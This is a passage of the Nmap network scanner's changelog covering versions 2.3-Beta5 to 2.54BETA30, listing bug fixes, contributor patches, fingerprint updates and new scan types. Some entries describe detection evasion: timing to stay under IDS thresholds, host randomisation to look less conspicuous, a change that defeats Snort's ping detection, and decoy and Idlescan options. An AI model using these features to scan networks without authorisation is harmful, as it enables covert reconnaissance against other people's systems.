o Included a bunch of fixes (mostly to prevent compiler warnings) from
William McVey (wam(a)cisco.com)

Nmap 2.54BETA30

o Added a Document Type Definition (DTD) for the Nmap XML output
format (-oX) to the docs directory. This allows validating parsers
to check nmap XML output files for correctness. It is also useful
for application programmers to understand the XML output structure.
The DTD was written by William McVey (wam(a)cisco.com) of Cisco Secure
Consulting Services ( http://www.cisco.com/go/securityconsulting ).

o Merged in a number of Windows fixes/updates from Andy Lutomirski
(Luto(a)myrealbox.com)

o Merged in fixes/updates (mostly to the Windows functionality) from
Matt Hargett (matt(a)use.net)

o Applied patch by Colin Phipps (cph(a)netcraft.com) which correctly
encodes special characters in the XML output.

o Applied patch by William McVey (wam(a)cisco.com) which adds the uptime
information printed with -O to the XML output format.

o Fixed byte-order bug in Windows packet matching code which caused
-PS and -PT to fail. Bug found and patch sent by Tim Adam
(tma(a)osa.com.au)

o Fixed segfault problem with "-sU -F". Nobody reported this until I
noticed it :(. Anytime you see "Segmentation Fault" in the latest
version of Nmap, it is probably a bug -- please mail me the command
you used, the OS/platform you are running on, and whether it is
reproducable.

o Added a convenience option "-oA (basefilename)". This tells Nmap to
log in ALL the major formats (normal, grepable, and XML). You give
a base for the filename, and the output files will be base.nmap,
base.gnmap, and base.xml.

o Documented the --append_output option which tells Nmap to append
scan results to any output files you have specified rather than
overwriting the files.

o Integrate TIMEVAL_SEC_SUBTRACT() fix by Scott Renfro (scott(a)renfro.org)
which improves timing accuracy.

Nmap 2.54BETA29

o Integrated William McVey's multi-portlist patch. This allows you to
specify different port numbers when scanning both TCP & UDP. For
example, if you want to UDP for 53,111 and 137 while TCP scanning
for 21-25,80,139,515,6000,8080 you could do: nmap -sSU -p
U:53,111,137,T:21-25,80,139,515,6000,8080 target.com . Prior to
this patch, you had to either use different Nmap executions or scan
both UDP & TCP of each port. See the man page for more usage info.

o Added/updated a bunch of fingerprints, including Windows XP release
candidates #1 & #2, OpenBSD 2.9, various home gateways/cable modem,
MacOS X 10.0.4, Linux 2.4.7, Guantlet Firewall 4.0a, a few Cisco
routers, and, most importantly, the Alcatel Advanced Reflexes IP
Phone :). Many other fingerprints were updated as well.

o Found and fixed some relatively major memory leaks based on reports
sent in by H D Moore (hdm(a)secureaustin.com), mugz
(mugz(a)x-mafia.org), and Steven Van Acker (deepstar(a)ulyssis.org)

o Applied patch from Chad Loder (chad_loder(a)rapid7.com) which improves
random target host selection (-iR) by excluding more undesirable
addresses.

o Fixed portscan timing bug found by H D Moore (hdm(a)secureaustin.com).
This bug can occur when you specify a --max_rtt_timeout but not
--initial_rtt_timeout and then scan certain firewalled hosts.

o Fixed port number printing bug found by "Stephen Leavitt"
(stephen_j_leavitt(a)hotmail.com)

o The Nmap source tarball now extracts with more lenient permissions
(sometimes world-readable or world-executable, but never
world-writable). If you don't want this, set your umask to 077
(which is what I do). Suggested by Line Printer (lps(a)rahul.net)

Nmap 2.54BETA28

o I hope that I have fixed the Libpcap "Unknown datalink type" problem that
many people reported. If you still receive this error, please send
me the following info:
1) Full output of Nmap including the command you typed
2) What OS/OS version you are using
3) What type of interface is the scan going through (PPP, ISDN, ethernet,
PPPoE, etc)
4) Whether you compiled from source or used the RPM version

o Hopefully fixed Libpcap lex/yacc generated file problem that
plagued a few folks.

o Various minor fixes/changes/updates

Nmap 2.54BETA27

o Fixed bug that caused "adding open port" messages to be printed even
when verbose mode was not specified. (patch sent by Doug Hoyte (
dugely(a)yahoo.com ).

o Fixed bug in zombie:port option parsing in Idlescan as well a few
other bugs in patch sent by Germano Caronni (gec(a)acm.org)

o Fixed Windows compilation (I broke it when I added Idlescan).

o Fixed a (Win32 only) port identification bug which would cause some
ports to be listed as "unknown" even when Nmap should know their
name. This was found at patched by David Griffiths
(davidg(a)intrinsica.co.uk).

o Fixed more nmap-os-fingerprints syntax/grammar violations found by
Raymond Mercier of VIGILANTe

o Fixed a memory leak in Nbase str*casecmp() functions by applying
patch sent by Matt (matt(a)use.net). I plan to kill this whole
strcasecmp.c file as soon as possible (it is a mess).

Nmap 2.54BETA26

o Added Idlescan (IPID blind scan). The usage syntax is
"-sI [zombie]".

o Fixed a bunch of fingerprints that were corrupt due to violations of
the fingerprint syntax/grammar (problems were found by Raymond
Mercier of VIGILANTe )

o Fixed command-line option parsing bug found
by "m r rao" (mrrao(a)del3.vsnl.net.in )

o Fixed an OS fingerprinting bug that caused many extra packets to be
sent if you request a lot of decoys.

o Added some debug code to help diagnose the "Unknown datalink type"
error. If Nmap is giving you this error, please send the following
info to fyodor@insecure.org : 1) The full output from Nmap
(including the command arguments) 2) What OS and OS version are you
using 3) What type of adaptor are you using (modem, ethernet, FDDI,
etc)

o Added a bunch of IDS sensor/console/agent port numbers from
Patrick Mueller (pmueller(a)neohapsis.com)

Nmap 2.54BETA25

o Added a whole bunch of new OS fingerprints (and adjustments) ranging
from big important ones (Linux 2.4.X, OpenBSD 2.9, FreeBSD 4.3,
Cisco 12.2.1, MacOS X, etc) to some that are more obscure ( such as
Apple Color LaserWriter 12/660 PS and VirtualAccess LinxpeedPro 120 )

o Upgraded Libpcap to the latest version (0.6.2) from tcpdump.org. I
modified the build system slightly by shipping pre-generated
scanner.c/grammer.c (instead of using lex/yacc) and I also upgraded
to the newest config.sub/config.guess .

o Fixed some issues with the new Libpcap under Linux (patches will be
sent to the developers).

o Added "All zeros" IP.ID sequence classification to account for the
new Linux 2.4 scheme which seems to use 0 whenever the DF bit is set
(probably a good idea).

o Tweaked TCP Timestamp and IP.ID sequence classification algorithms

Nmap 2.54BETA24

o Fixed compilation problems on MacOS X publis release. Thanks to
Nicolas Dawson (nizcolas(a)myrealbox.com) for securing an account for
me.

o On the suggestion of the ever-helpful LaMont Jones (lamont(a)hp.com),
I obtained the newest config.guess/config.sub from
http://subversions.gnu.org/cgi-bin/cvsweb/config and made
libpcap/nbase use symlinks rather than copeis of the file

o Applied patch from LaMont Jones (lamont(a)hp.com) which makes Nmap
compatable with gcc 3.0 (apparently printf() is a macro in that
version)

o Applied patch from Colin Phipps (cph(a)netcraft.com) which fixes a
problem that kept UDP RPC scanning from working unless you were also
doing a TCP scan.

o Applied a patch from Chris Eagle (cseagle(a)redshift.com) which fixes
Windows compilation (I broke it with a recent change).

o Updated Lithuanian translation of man page based on a newer version sent
by Aurimas Mikalauskas (inner(a)crazy.lt)

o Killed carriage returns in nmap.c and nmapfe.c, which caused
problems for some (SGI) compilers. Problem noted by Artur
Niederstebruch (artur(a)sgi.com)

o Updated to latest version of rpc program number list, maintained by
Eilon Gishri (eilon(a)aristo.tau.ac.il)

o Fixed a quoting bug in the Nmap man page found by
Rasmus Andersson (rasmus(a)pole-position.org)

o Applied RPM spec file changes from "Benjamin Reed"
(ranger(a)befunk.com) which allows you to avoid building the frontend
by adding "--define frontend 0" to the build command (eg --rebuild,
--ba, etc).

Nmap 2.54BETA22

o Eliminated usage of u_int32_t (was causing compilation errors on
some Sun and HP boxes). Problem first noted by Nick Munger
(nmunger(a)Oswego.EDU) and Ralf Hildebrandt
(Ralf.Hildebrandt(a)innominate.com) and Antonin Sprinzl
(Antonin.Sprinzl(a)tuwien.ac.at)

o Defined integer-width typedefs such as u32/s32/u16/etc. in Nbase.
Went through much of the Nmap code and substituted these in where
correct lengths are important (port numbers, IP addresses, etc).

Nmap 2.54BETA21

o Cleaned up a few build/distribution issues that were reported by
LaMont Jones (lamont(a)hp.com)

o Fixed compiler warning noted by Gabor Z. Papp (gzp(a)papp.hu) )

Nmap 2.54BETA20

o Added TCP Timestamp sequence checking for OS detection and
Netcraft-style uptime tests.

o Found and fixed (I hope) byte alignment problem which was causing
bus errors on SPARC64 ( reported by H D Moore
(hdm(a)secureaustin.com) and Matthew Franz (mfranz(a)cisco.com) )

o Apple Darwin (Mac OS X) 1.2 portability patch from Rob Braun
(bbraun(a)synack.net)

o Added IPID sequence number predictability report (also now used in
OS detection).

o Show actual IPID, TCP ISN, and TCP timestamp values in XML format
output rather than just the cooked results.

o Suppress IPID and TCP ISN predictability report unless you use -v
(you need -O as well).

o Applied Solaris 8 compilation fixes from Germano Caronni (
gec(a)acm.org )

o Applied configure.in variable name typo fixes from Christian
Weisgerber (naddy(a)openbsd.org)

o Applied some more changes from Andy Lutomirski
(Luto(a)mailandnews.com) which provides better detection and
reporting from some heinous errors.

o Added -n and -R (always/never DNS resolve) options to the man page.

Nmap 2.54BETA19

o I ported NmapFE to Windows so that Win32 users can use the graphical
interface. It generally works, although I haven't tested much.
Patches welcome!

o Various little fixes and cleanups, especially to the Windows port.

o Applied patch from Andy Lutomirski (Luto(a)mailandnews.com) which
enhances some of the Win* error messages and adds the --win_trace
debugging option.

o Applied some patches from Jay Freeman (saurik(a)saurik.com)
o New --data_length option adds indicated number of random data
bytes to send with scan packet and tcp ping packet (does not
currently work with ICMP ping packet). Does not affect OS
detection, RPC, or connect() scan packets.
o Windows portability fixes
o Various other little fixes.

o Renamed rpc.h and error.h because they conflict with Windows include
files. By the way, this was a pain to figure out because VC++ is
such a crappy compiler! It basically just says problem in
"foobar.h" without giving you any idea how foobar.h got included!
gcc gives you a nice message tracing the chain of include files!

Nmap 2.54BETA16

o Upgraded to latest version of Winpcap ( 2.1-beta )

o Merged in Windows port code from Ryan Permeh ( ryan(a)eeye.com) and
Andy Lutomirski ( Luto(a)mailandnews.com ).

o Took out C++ compiler test from nbase configure script. It was
inserted accidently, but I found it interesting that only 2 people
complained about this causing them problems. I guess most everyone
already has C++ compilers.

o Applied patch from Steve Bleazard (steve(a)bleazard.com) which fixed
bug in internal Smoothed Round Trim Time calculations.

o Fixed CFLAGS computation error in configure. Problem discovered and
patched by Fredrik Lundholm (exce7(a)ce.chalmers.se)

o Added more debugging code for "Unknown datalink type" error -- if
you get this, please send me the full error msg including hex
values.

o Added Portuguese man page translations from Antonio Pires de Castro
Junior (apcastro(a)ic.unicamp.br).

o Capitalized all references to God in error messages.

Nmap 2.54BETA7

o Applied patch from Hubert Feyrer
(hubert.feyrer(a)informatik.fh-regensburg.de) which adds support for
the new NetBSD DLT_PPP_* types.

o Updated to Eilon Gishri's (eilon(a)aristo.tau.ac.il) newest version
of nmap-rpc at ftp://ftp.tau.ac.il/pub/users/eilon/rpc/rpc

o Moved a bunch of the scanning engine related functions to new files
(scan_engine.c and scan_engine.h ). Timing functions were moved to
the new timing.c/timing.h . Other stuff was shifted to
tcpip.c/tcpip.h. At some point, nmap.c will only contain the Nmap
command line UI.

o Updated Russian version of man page from Alex Volkov (topcat(a)nm.ru)

Nmap 2.54BETA6

o Added XML output (-oX). Hopefully this will help those of you
writing Nmap front ends and other tools that utilize Nmap. The
"machine-readable" output has been renamed "grepable" (-oG) to
emphasize that XML is now the preferred machine-readable output
format. But don't worry if your tool uses -oM , that format (and
the deprecated -oM flag) won't go away any time soon (if ever).

o Applied patch from Stefan Rapp (s.rapp(a)hrz.uni-dortmund.de) which
fixes a variable argument integer promotion problem in the new
snprintf compatability file. This is important for Redhat 7
systems.

o Reorganized output-related routines so that they now reside in
output.c & output.h. Let me know if I accidently screwed up the
behavior of any scan types in the process.

Nmap 2.54BETA5

o Revamped the 'compatability libraries' subsystem. Moved all of that
to a new library called 'libnbase' and changed Nmap and NmapFE to
use that. I included a better version of *snprintf and some other
compatability files. Obviously I cannot test these changes on every
whacked OS that needs this compatability cruft, so please let me
know if you run into compilation problems.

o Fixed a problem found by Martyn Tovey (martyn(a)netcraft.com) when
using Nmap on platforms that dislike division by zero.

o Removed 128.210.*.* addresses from Nmap man page due to complaints
from Purdue security staff.

o Fixed FreeBSD (some versions) compilation problem found by Martyn
Tovey (martyn(a)netcraft.com)

Nmap 2.54BETA4

o Upgraded to the very latest Libpcap version ( the 9/3/00 CVS
snapshot ). This version is from the tcpdump.org group rather than
the Lawrence Livermore crew. The most important advantage is Linux
Socket Filter support (so you won't have that annoying syslog
message about Nmap using the obsolete SOCK_PACKET interface).

o I tried to install Nmap on yet another machine without lex/yacc or
flex/bison. That was the last straw! I am now shipping the
generated C files, which eliminates the lex/yacc requirement.

o Applied patch by Jay Freeman (saurik) (saurik(a)saurik.com) to make
Nmap C++-clean (this was lot of tedious work! Thanks!). Note that
Nmap still uses a normal C compiler by default, but Nmap derivatives
may appreciate C++ compatability. Note that this only applies to
"Nmap proper", not libpcap.

o Added a HACKING file for people who want to help with Nmap
development. It describes preferred patch formats, development
resources, and offers a number of useful changes that would likely
be accepted into the main tree.

o Fixed a configure.in error found by Vacuum
(vacuum(a)technotronic.com) which could cause compilation errors.

o Fingerprint file adjustments for better Win* detection

o Ensure libpcap is not configured and/or installed if you already
have a "new enough" version (0.4a6+) installed.

o Included Italian translation of Nmap man page from Giorgio Zoppi
(deneb(a)supereva.it) .

o Fixed a SYN scan problem that could cause a major slowdown on some
busy networks.

o Fixed a crash problem in NmapFE reported by sverre ( sverre(a)gmx.net )

o Added an "SInfo" line to most printed fingerprints. It looks
similar to this:
SInfo(V=2.54BETA4%P=i686-pc-linux-gnu%D=9/4%Time=9681031%O=7%C=1)
and contains information useful when fingerprints are reported (Nmap
version/platform, scan date, and open/closed ports used)

o Fixed RPCGrind (-sR) scan. It has been almost completely broken
since 2.54BETA2 (which has been out for two weeks) and nobody
reported it! I noticed the problem myself during testing of
something else. I am disappointed that nobody bothered to even let
me know that this was broken. Does anyone even use RPC Scan?

o Various other small fixes/improvements

Nmap 2.54BETA3

o Went through and added/adjusted a bunch of fingerprints. A lot of
people submitted Windows Millenium Edition (WinME) beta
fingerprints, but nobody submitted IPs for them. So please let me
know if this version detects your WinME boxes.

o Applied NmapFE patch from Michael Fischer v. Mollard (mfvm(a)gmx.de)
which made did the following:
o Added delete event so that NmapFE always quits when you kill it
with your window manager
o added the menubar to the vbox instead to the fixed widget

o Various small fixes/improvements

Nmap 2.54BETA2

o Added a shortcut which can make single port SYN scans of a network
much faster. For example, if a new sendmail vulnerability is found,
this reduces the time it takes to scan your whole network for port
25. This shortcut takes effect when you do "-PS[port] -sS
-p[port]". For example 'nmap -n -sS -p25 -PS25 24.0.0.0/8". This
optimization doubled the scan speed in a 30,000 IP test I performed.

o Added -sL (List scan). Just as ping scan (-sP) allows you to short
circuit the scan right after pinging, -sL allows you to short
circuit the scan right after target selection. This allows you to
see what hosts WOULD be scanned without actually doing it. The
hosts will be resolved unles you use -n. Primary uses:
1) Get all the IPs in a network (like A.B.C.D/16) and take out
machines that are too fragile to be scanned safely before
calling Nmap with the new list (using -iL).
2) Test that a complex spec like 128.4,5,7-9.*.7 does what you
expect before actual scanning.
3) When all you want to do is resolve a bunch of IPs.
4) You just want results of a zone transfer (if it is implemented).

o Added some new fingerprints and adjusted some others based on
submissions to the DB (I still have a lot more to go through so
don't worry if your submission is still not detected).

o Added a warning when you scan 0 hosts (eg "nmap -v"). There are
various other output tweaks as well.

o Ensured that 0.0.0.0 can be scanned by nmap (although on some OSs,
like Linux, it won't work due to what seem to be kernel bugs). Oh
well. I'll look into it later.

Nmap 2.54BETA1

o Added an extremely cool scan type by Gerhard Rieger ( rieger at
iue.tuwien.ac.at ) -- IP Protocol scanning. Basically it sends a
bunch of IP headers (no data) with different "protocol" fields to
the host. The host then (usually) sends back a protocol unreachable
for those that it does not support. By exclusion, nmap can make a
list of those that are supported. This is similar in concept to
(and is implemented using most of the same scanning routines as) UDP
scanning. Note that some hosts do not send back protocol
unreachables -- in that case all protocols will appear "open".

o Fixed an uninitialized variable problem in NmapFE (found by Alvin
Starr (alvin at iplink.net )

o Fixed a packaging problem that lead to the Nmap man page being
included twice in the .tgz .

o Fixed dangling nroff include in xnmap man page (noted by Debian Nmap
package maintainer LaMont Jones (lamont(a)security.hp.com)

o Give a warning when no targets at all are specified

o Updated 'make uninstall' so that it deletes all relevant files

o Included latest nmap-rpc from Eilon Gishri (eilon at aristo.tau.ac.il)

o Eliminated -I. from Nmap's and NmapFE's makefiles (suggested by "Jay
Freeman (saurik)" (saurik at saurik.com)

o Added Russian documentation by Alex Volkov

o Added Lithuanian documentation from Aurimas Mikalauskas (inner(a)dammit.lt)

Nmap 2.53

o Fixed a commenting issue that could cause trouble for non-GNU
compilers (first found by Jan-Frode Myklebust (janfrode at
parallab.uib.no))

o A few new services to nmap-services

Nmap 2.52

o Added very simple man pages for xnmap/nmapfe (lack of man pages for
these was noticed by LaMont Jones (lamont(a)hp.com), the Debian Nmap
package maintainer, based on bug report by Adrian Bunk
(bunk(a)fs.tum.de ).

o Fixed a "Status: Down" machine name output problem in machine
parseable logs found by Alek O. Komarnitsky (alek(a)ast.lmco.com)

o Took some wierd files out of the doc directory (cd, grep , vi, and
.swp)

o Fixed some typos found by Thomas Klausner (wiz(a)danbala.ifoer.tuwien.ac.at)

o Updated nmap-rpc with new entries found in the latest version of
Eilon Gishri's rpc list.

Nmap 2.51

o Fixed target parsing bug found by Steve Horsburgh (shorsburgh(a)horsburgh.com).

o Changed makefile/rpm to store fingerprint, rpc, and services file in
$prefix/share/nmap rather than $prefix/lib/nmap , since these files
are architecture independent. You should now use ./configure
--datadir instead of ./configure --libdir to change the default
location. Suggested by Thomas Klausner
(wiz(a)danbala.ifoer.tuwien.ac.at).

o I am now including Eilon Gishri's (eilon(a)aristo.tau.ac.il) rpc
number list (which he recently merged with the Nmap 2.50 rpc list).

o Included Spanish and French HTML versions of the Nmap man page (may
not always be up to date).

Nmap 2.50

o Fixed an IP calculation error which could occur in some cases where
you scan machines on different devices (like lo and eth0). This
problem was discoved by Jonathan Fine (jfine(a)psu.edu).

o Fixed a problem that could, in rare cases, cause a SYN scan scan to
crash (the error message was "attempt to add port number X with
illegal state 0"). This problem was reported by Erik Benner
(erik(a)xyzzy.net)

o Changed the .spec file so that RPM versions create a xnmap link to
nmapfe ( the normal make install has done this for a long time ).

Nmap 2.3BETA21

o A number of people reported problems with nmapfe in various
environments (specifically gdk errors, hangs, and crashes). I think
that is now fixed. Let me know if you still have the problem (make
sure the title bar says BETA21).

o Added a bunch of OS fingerprints based on all the contributions in
the last month or so.

o Fixed a bug that completely broke RPC scanning in BETA19.

o Added list of ports scanned near the top of each machine log WHEN
-v was specified. Here is an example of the format:
# Ports scanned: TCP(13;1-10,22,25) UDP(0;)
The "13" above is the number of TCP ports being scanned.

o Got rid of a snprintf() from nmapfe sine some systems don't have it
:( and I'm to lazy to integrate in the snprintf that comes with nmap
right now.

o Fixed important target IP range parsing bug found by Jean-Yves Simon
( lethalwp(a)linuxbe.org ).

o Applied patch by albert chin (china at thewrittenword.com) which
adds --with-libpcap[=DIR] option to configure and and adds an
elegant approach for -lnsl and -lsocket checking to configure .

o Fixed a bug which could cause Nmap to mark a port filtered based on
ICMP dest. unreachable packets relating to a different host than the
one being scanned.

o Fixed output problem relating to ident scan noted by Peter Marschall
( peter.marschall at mayn.de )

o Applied patch to services.c by Andrew Brown (atatat(a)atatdot.net)
which prevents some useless debugging (-d) output when reading some
kindss of /etc/services files.

o Added "Host: [machinename] (ip) Status: Down" to machine logs when
the verbose option is given (just like down hosts are reported to
stdout when verbose is given). Suggested by Alek Komarnitsky.

o Applied NetBSD compatability patch provided by Mipam (reinoud at
ibbnet.org) which changes an autoconf macro to check for
getopt_long_only instead of getopt_long.

o Nmap used to print an inaccuracy warning when no open TCP ports were
found on the target machine. Due to a bug, this was not always
being printed. Problem found by Matt (matt at use.net) and Ajay
Gupta2 (Ajay.Gupta2 at ey.com).

o Added the number of ports in the ignored state right after the state
name in machine parseable logs. It used to looke like: "Ignored
State: closed" whereas now it looks like: "Ignored State: closed
(1508)" Meaning that 1508 ports were closed and thus are not
specifically enumerated.

o Changed all nmapfe calls to gdk_font_load into gdk_fontset_load .
Bennett Feitell (bfeitell at panix.com) suggested that this fixed
some nmapfe font problems.

Nmap 2.3BETA20

o Applied patch sent in by s.rapp(a)hrz.uni-dortmund.de which fixes a
memory alignment bug in osscan.c which could cause core dumps on
machines which require aligned access (like SPARC).

o Fixed a compilation problem on machines that do not have MAP_FAILED
defined (as a return value to mmap). Problem noted by Phil
Stracchino (alaric(a)babcom.com).

Nmap 2.3BETA19

o Tweaked the output so that it now tells how many ports are not shown
and what state the ignored ports are in. This info could be
inferred before by people who had studied the manpage, but now the
info is explicitly available. I cleaned up a bunch of stuff
internally to make this happen. I hope I didn't break anything!

o Changed NmapFE so that it always kills any running Nmap process when
you press exit. Problem noted by Marc Renner
(mrenner(a)ci.marysville.wa.us)

o Apparently some Linux (glibc) systems now come with a "strcasestr"
function. So I have made autoconf look for this and use the native
version if supported. (problem noted by Sami Farin
(sfarin(a)ratol.fi)).

o Added a new attribute "Ignored State: xxx" to the machine parseable
logs, where xxx is the state (closed, filtered, or UNfiltered) that
is being ignored. Ports in that state are not listed (they weren't
listed in earlier versions either). Perhaps I should list ALL ports
for machine parseable output. Opinions?

o Merged in a patch sent in by Mipam (reinoud(a)ibbnet.org) which is
apparently part of the OpenBSD Nmap "port". Although Nmap seems to
work fine for me on my OpenBSD 2.4 box, a couple OpenBSD users have
complained of problems. Hopefully this will help. (it adds DLT_LOOP
and DLT_ENC offset cases when reading from libpcap).

o A few really minor bugfixes.

Nmap 2.3BETA18

o Fixed a very important bug that occurred when SYN scanning
localhost. Many thanks to Dries Schellekens (
gwyllion(a)ace.ulyssis.student.kuleuven.ac.be ) for first reporting
the problem.

o Uros Prestor from TurboLinux informed us that the latest versions of
Nmap work with Linux on the upcoming Intel Merced/Itanium IA-64
processors. He also said that the TurboLinux distribution includes
Nmap. Kudos to them! As well as the other distros that support
Nmap (Debian, Red Hat, Suse, Trinux) and of course FreeBSD, NetBSD,
& OpenBSD. Does anyone know if Nmap ships with the latest from
Mandrake or Corel? The latest Solaris includes some Free software.
If anyone can get them to ship Nmap, I will buy you a case of beer
:).

o Added a #define to change vsnprintf to vsprintf on machines which do
not support the former (mostly Solaris 2.5.1 and earlier). This
function is less safe. For people who care about security, we
recommend an upgrade to Solaris 8 (or Linux/*BSD).

o Changed the NmapFE version to 0.[nmap_version] rather than always
leaving it at 0.9.5 (which was confusing). Thanks to J.D.K. Chipps
(jdkc(a)woptura.com) for noticing this.

o Added support for "-vv" (means the same as "-v -v"). Older versions
of Nmap supported it (noted by George Kurtz).

Nmap 2.3BETA17

o Added ACK scanning. This scan technique (which van Houser and
others have been bugging me to add for years :), is great for
testing firewall rulesets. It can NOT find open ports, but it can
distinguish between filtered/unfilterd by sending an ACK packet to
each port and waiting for a RST to come back. Filtered ports will
not send back a RST (or will send ICMP unreachables). This scan
type is activated with -sA .

o Documented the Window scan (-sW) which Lamont Granquist added in
September 99.

o Added a whole bunch of OS fingerprints that people have submitted.

o "Protocol" field in output eliminated. It is now printed right next
to the number (/etc/services style). Like "22/tcp". I wonder what
I should put in the extra white space this leaves on the report :).

o Added --resume option to continue a large network scan where you
left off. This is useful for recovering from errors (modem drops
carrier, network outage, etc). It also allows you to start and stop
for policy reasons (like if a client only wants you to scan on
weekends or at night) or if you want to run the scan on a different
host. Usage is 'nmap --resume logfile' where logfile can be either
normal (-oN) or machine parseable (-oM) logfile from the scan that
was aborted. No other options can be given (the options in the
logfile from the original scan will be used). Nmap will start off
with the host after the last one successfully scanned in the log
file.

o Added --append_output option which causes -oN/-oM/-oS to APPEND to
the output file you specify rather than overwriting it.

o Various internal code cleanup, makefile fixes, etc.

o Changed version number from 2.3BETA* to 2.30BETA* to appease various
packaging systems that thought 2.3BETA was < 2.12 .

o Nmap output to files now correctly flushes output after scanning for
each host is finished.

o Fixed compiler -L flags error found by Ralf Hildebrandt
(R.Hildebrandt(a)tu-bs.de)

o Fixed configure scripts so that options you give to the Nmap
configure (like --prefix ) are also passed to the nmapfe configure
script. This problem was noted by Ralf Hildebrandt
(R.Hildebrandt(a)tu-bs.de). While I was at it, I added some other
cleanups to the system.

o Added --noninteractive option for when nmap is called from scripts
(where stuff like prompting users for info is unacceptable). It
does not currently do anything (Nmap never prompts) and script
writers should probably wait until at least May '2000 so their
scripts still work with earlier versions of Nmap.

o Updated to the latest config.guess and config.sub from Autoconf 2.13

o Applied patch by Sven (s.carstens(a)gmx.de> which fixes a
segmentation fault problem in Nmapfe colored mode as well as some
output niceties.

o Changed some C++ comments to C-style for portability (noticed by
"Sergei V. Rousakov" (sergei(a)cas.Vanderbilt.Edu) )

Nmap 2.3BETA14

o Peter Kosinar (goober(a)gjh.sk) performed some cleanup of the output
routines and as a bonus he added skript kiddie output mode!!! Try
it out by adding "-oS - " to your nmap command line. Note that
using '-' to represent stdout instead of a filename is something you
can do with any of the output modes.

o Ensured that Nmap always gives up on ident scan after the first port
attempt finds it to be closed (problem noticed by Matt
(matt(a)use.net))

o Changed strsep's in nmapfe to more portable strtok's (should
especially help Nmapfe compiles on Solaris)

o Changed permutation algorithm to make port order and host order
shuffling more random.

o Various minor changes and internal code cleanup.

o Fixed integer overflow that was limiting the max --host_timeout
value to about 2,000,000 milliseconds (~1/2 hour). The limit is now
about 4,000,000,000 milliseconds (~1 month). I really hope you
don't need more than that :).

Nmap 2.3BETA13

o I made Nmap smarter about detecting filtering during UDP, Xmas,
NULL, and FIN scans.

o Updated Nmapfe to 0.9.5 (+ a patch from NmapFE author Zach Smith)

o Fixed a problem where NmapFE would fail to honor $PATH (Noticed by
K. Scott Rowe (kscott(a)nmt.edu)

o Added a couple ICMP unreachable messages Nmap was missing (found by
Bifrost (bifrost(a)minions.com)).

o Internal cleanup that improves the way some port lists are stored.

o Added some more RPC numbers from (mmmorris(a)netscape.net)

o Relaxed the dependency requirements of nmapfe rpm (now will accept
any version of Nmap).

Nmap 2.3BETA12

o Added interactive mode which adds convenience for managing nmap
sessions and also enhances privacy. Get to it with --interactive
and then type 'h' for help.

o Added/modified many fingerprints including the latest 2.3.X Linux
releases, the latest Win2000 builds, the Apple Airport Wireless
device, and several dozen more.

o Migrated to RPM .spec file sent in by Tim Powers
(timp(a)redhat.com). That is the file they will be using to package
Nmap with the power tools CD in the next Redhat release. The most
important changes are that Nmap (only the RPM version) now installs
in /usr/* instead of /usr/local/* and the frontend is now
dynamically linked with GTK and comes in a separate rpm.

o The -i (input from list) option has been deprecated. From now on
you should use -iL [filename] to read from a list or -iR to have
Nmap generate random IPs to scan. This -iR option is new.

o The -o and -m options have been deprecated. From now on, you should
use -oN for normal (human readable) output and -oM for machine
parseable output. At some point I might add -oH (HTML output) or
-oSK (sKr|pt kiDdi3 0uTPut).

o Added --randomize_hosts option, which causes hosts be be scanned in
non-sequential order. This makes scans less conspicuous. For
efficiency reasons, the hosts are chopped into groups of 2048 and
then each group is internally shuffled (the groups still go in
order).

o Rearranged the help ('nmap -h' or 'nmap' or 'nmap --help') screen to
be shorter (37 -> 23 lines!) and include some of the new features of
this release. The man page was updated as well.

o Fixed longstanding bug where nmap -sS mylocalnetwork/24 would not
successfully scan the host running nmap.

o Internal improvements to make scanning faster with -i (input list)
or when you specify multiple machines on the command line.

o Uses faster GCD algorithm and fixed several typos (sent in by Peter
Kosinar).

o Provide more information in machine/human readable output files
(start time, end time, RPC program name, Nmap version number)

o Killed the -A option (if you don't know what that is then you won't
miss it. In fact, even if you do know what it is you won't miss
it.)

Nmap 2.3BETA10

o Added about 70 new OS fingerprints so that Nmap can detect more
systems. The most important new fingerprints are probably:
* The new SP5+ NT boxes -- After all these years MS FINALLY made
sequence prediction harder (on NT anyway).
* Solaris 8 Pre-Release
* Sega Dreamcast (Hack that!)
* Latest Windows 2000 builds
* OpenBSD 2.6

Nmap 2.3BETA9

o Applied patch by Mark Abene (Phiber Optik) to fix several type
length issues so that it works on Linux/Alpha.

o Applied patch by Matthieu Verbert (mve(a)zurich.ibm.com) to speed up OSScan

Nmap 2.3Beta8

o Added "firewall mode" timing optimizations which can decrease the
ammount of time neccessary to SYN or connect scan some heavily
filtered hosts.

o Added min_rtt_timeout timing option (see man page for details)

o Changed "TCP Ping" to use a random ACK value rather than 0 (an IDS
called Snort was using this to detect Nmap TCP Pings).

o Some changes for better Alpha/Linux support based on investigation
by Bill Beers (wbeers(a)carolina.rr.com)

o Applied changes for FDDI support by Tobias J. Nijweide (tobias(a)mesa.nl)

o Applied a socket binding patch from LaMont Jones
(lamont(a)security.hp.com) which can be useful when using -S to
specify one of multiple interfaces on a machine.

o Made OS detection smart enough to first check scan results for a
known closed port instead of immediately resorting to a random one.
This improves OS detection against some machines behind packet
filters. (suggested by van Hauser)

o Applied a shortcut suggestion by Thomas Reinke which can lead to a
tremendous speedup against some firewalled hosts.

o Added some ports commonly used for RPC to nmap-services

o Fixed a problem with the timing of an RPC scan (could come before
the UDP scans they rely on)

o Added a number of new ports to nmap-services

Nmap 2.3Beta6

o Added sophisticated timing controls to give the user much more
control over Nmap's speed. This allows you to make Nmap much more
aggressive to scan hosts faster, or you can make Nmap more "polite"
-- slower but less likely to wreak havoc on your Network. You can
even enforce large delays between sending packets to sneak under IDS
thresholds and prevent detection. See the new "Timing Options"
section of the Nmap man page for more information on using this.

o Applied Lamont Granquist's (lamontg(a)u.washington.edu) Window scan
patch (I changed the name from ACK scan to Window scan since I may
add another scan that uses ACK packets and I don't want them to be
confused). -sW activates this scan type. It is mostly effective
against BSD, AIX, Digital UNIX, and various older HP/UX, SunOS, and
VAX. (See nmap-hackers mailing list archives for an extensive list).

o Added various long options people expect to see like --version ,
--help , --usage , etc. Some of the new timing options are also long.
I had to add getopt_long C files since most non-Linux boxes don't
support getopt_long in libc.

o Human readable (-o) output changed to include the time/date of the
scan. Suggested by van Hauser.

Nmap 2.3-Beta5

o Changed RPC output based on suggestions by David O'Brien
(obrien(a)NUXI.com) and Lance Spitzner (lance(a)spitzner.net). I
got rid of the "(Non-RPC)" unnecessary clutter which appeared after
each non RPC port and the "(untested)" that appeard after each
"filtered" port.

o Added a ton of new OS fingerprints people submitted. I had about
400 in my inbox. Of course, almost 100 of them were submissions for
